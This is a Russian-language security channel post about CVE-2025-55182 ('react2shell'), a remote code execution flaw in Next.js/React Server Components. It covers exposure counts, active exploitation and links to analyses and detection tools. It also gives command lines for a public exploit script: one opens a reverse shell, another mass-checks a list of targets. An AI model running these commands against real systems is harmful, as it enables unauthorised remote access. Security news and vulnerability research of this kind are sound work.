603просмотров
64.6%от подписчиков
5 декабря 2025 г.
statsScore: 663
Небольшое продолжение по CVE-2025-55182 CVE-2025-55182 теперь react2shell, а так же появился стабильный эксплоит. Получить шелл можно в одну команду:
# Предварительно не забываем поднять листенер, скрипт его не поднимает.
python3 exp.py http://127.0.0.1:3000 --revshell 127.0.0.1 1234 # Или сразу прогнать список
python3 exp.py -f targets.txt --check
Подоспел и плагин для Burp: Next.js RSC RCE Scanner. По данным FOFA в интернете торчит 8.7 миллионов потенциально уязвимых хостов (в Shodan результаты скромнее, но тоже неплохо), а Amazon уже сообщает, что китайские хакеры уже вовсю эксплуатируют уязвимость. Разбор самой уязвимости можно почитать в блоге SeachLight Cyber и в PoC-разборе от maple3142. А у Project Disovery появился обновлённый шаблон для Nuclei. —- - Gihub Gist: POC for CVE-2025-55182 that works on Next.js 16.0.6
- SeachLight Cyber High Fidelity Detection Mechanism for RSC/Next.js RCE (CVE-2025-55182 & CVE-2025-66478)
- AWS Security Blog: China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)